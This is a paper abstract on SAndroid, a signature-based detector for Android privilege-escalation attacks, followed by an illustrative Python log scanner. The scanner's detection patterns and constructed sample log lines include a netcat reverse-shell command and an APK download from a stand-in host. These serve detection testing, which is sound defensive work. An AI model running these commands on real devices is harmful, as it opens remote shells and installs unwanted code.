Signature-based detection of privilege-escalation attacks on Android

Android has become a major player in the smartphone software arena, thanks to the overwhelmingly positive reception of Google Play by developers and users alike. Android applications are governed by a set of permissions that the platform uses for access control. However, through a privilege-escalation attack, a malicious application can obtain capabilities it was never granted and reach a resource that its own permissions do not allow. Serious security and safety consequences such as privacy violations, reverse-shell access to the device, and drive-by downloads may follow. We propose a flexible and efficient defense mechanism against such attacks. Our solution, SAndroid, is an extensible and lightweight application. It provides enhanced safety and security against privilege-escalation attacks through rapid detection. SAndroid is based on active monitoring and detection of malicious applications by tracking system logs and matching signatures of malicious processes. The assurance of safety provided by SAndroid is confirmed through design, testing, and verification. SAndroid follows a modular approach that permits high flexibility and efficiency. Through experiments, we confirmed that SAndroid is an efficient and low-cost solution with negligible false positives. This paper describes the architecture and design of the SAndroid framework and provides details of our experiments.
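The abstract names the two ingredients of the detector, system logs and malicious process signatures, without showing what a signature match over a log stream looks like. The following Python sketch is an added illustration and is not SAndroid's code: it applies regex process signatures (su spawn, netcat reverse shell, APK fetch) to constructed logcat lines in the classic brief format, and adds a cross-application rule that flags a caller starting a component of another package whose effect requires a dangerous permission the caller does not hold, which is the confused-deputy form of privilege escalation. The package table, UID mapping, component table and all log lines are hypothetical stand-ins for what a real monitor would read from PackageManager and logcat.

```python
"""Signature-based scan of logcat lines for privilege-escalation indicators.

Added illustration, not SAndroid's own implementation. Two signature families:
(1) process signatures: regexes over commands that show up in log messages;
(2) a cross-app component-start rule (confused deputy / capability leak).
All package data and log lines below are constructed for the example.
"""
import re
from dataclasses import dataclass

# Hypothetical package knowledge a real monitor would read from PackageManager.
UID_TO_PACKAGE = {
    10042: "com.example.flashlight",  # holds no dangerous permission
    10043: "com.example.gallery",
    10044: "com.example.smsgateway",
}
PACKAGE_PERMISSIONS = {
    "com.example.flashlight": set(),
    "com.example.gallery": {"android.permission.READ_EXTERNAL_STORAGE"},
    "com.example.smsgateway": {"android.permission.SEND_SMS"},
}
# Permission whose effect an exported component exercises on a caller's behalf.
COMPONENT_EFFECT_PERMISSION = {
    "com.example.smsgateway/.SendService": "android.permission.SEND_SMS",
}

# logcat "brief" format: L/Tag( pid): message
LOGCAT_RE = re.compile(r"^(?P<level>[VDIWEF])/(?P<tag>[^(]+)\(\s*(?P<pid>\d+)\): (?P<msg>.*)$")
# ActivityManager component start: "START u0 {... cmp=pkg/.Cls ...} from uid N"
START_RE = re.compile(r"START u0 \{.*?cmp=(?P<pkg>[\w.]+)/(?P<cls>[\w.$]+).*?\} from uid (?P<uid>\d+)")

# Process signatures: (name, regex over the message field). Hypothetical rule set.
PROCESS_SIGNATURES = [
    ("su-spawn", re.compile(r"(?:^|[\s/])su(?:\s|$)")),
    ("reverse-shell", re.compile(r"\bnc\b.*\s-e\s+/system/bin/sh|/system/bin/sh\s+-i\b.*?/dev/tcp/")),
    ("apk-fetch", re.compile(r"\b(?:wget|curl)\b.*https?://\S+\.apk\b")),
]


@dataclass
class Alert:
    signature: str
    pid: int
    source: str   # log tag, or the caller package for the cross-app rule
    detail: str


def parse_line(line):
    """Split one brief-format logcat line into its fields, or None if it does not parse."""
    m = LOGCAT_RE.match(line)
    return m.groupdict() if m else None


def check_component_start(msg):
    """Return (caller, target, permission) when a caller starts another package's
    component whose effect needs a permission the caller itself lacks."""
    m = START_RE.search(msg)
    if not m:
        return None
    caller = UID_TO_PACKAGE.get(int(m["uid"]))
    target = f"{m['pkg']}/{m['cls']}"
    needed = COMPONENT_EFFECT_PERMISSION.get(target)
    if caller is None or needed is None or caller == m["pkg"]:
        return None   # unknown caller, unprotected component, or an in-package call
    if needed in PACKAGE_PERMISSIONS.get(caller, set()):
        return None   # caller holds the permission itself: no escalation
    return caller, target, needed


def scan(lines):
    """Run every signature over every parseable line; return the alerts in log order."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        pid = int(rec["pid"])
        for name, rx in PROCESS_SIGNATURES:
            if rx.search(rec["msg"]):
                alerts.append(Alert(name, pid, rec["tag"].strip(), rec["msg"]))
        hit = check_component_start(rec["msg"])
        if hit:
            caller, target, needed = hit
            alerts.append(Alert("privilege-escalation", pid, caller,
                                f"{caller} started {target} without {needed}"))
    return alerts


# Constructed log lines (not captured from a device): three benign, three malicious.
SAMPLE_LOG = [
    "I/ActivityManager(  512): START u0 {act=android.intent.action.MAIN cmp=com.example.gallery/.MainActivity} from uid 10043",
    "I/ActivityManager(  512): START u0 {act=com.example.SEND cmp=com.example.smsgateway/.SendService} from uid 10044",
    "I/ActivityManager(  512): START u0 {act=com.example.SEND cmp=com.example.smsgateway/.SendService} from uid 10042",
    "D/flashlight( 2311): exec /system/xbin/su -c 'nc -e /system/bin/sh 203.0.113.5 4444'",
    "D/flashlight( 2311): exec wget -O /sdcard/Download/update.apk http://203.0.113.5/update.apk",
    "W/System.err( 2311): java.io.IOException: Permission denied",
]

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f"[{a.signature}] pid={a.pid} source={a.source}: {a.detail}")
```

The benign lines (an app starting its own activity, the SMS gateway calling its own service, a stray exception) produce no alert, while the flashlight app invoking the gateway's service without SEND_SMS is flagged alongside the su spawn, the reverse shell and the APK download. A deployed monitor would read the package tables from PackageManager rather than from literals, and the `su` signature would need a whitelist on rooted devices to keep false positives low.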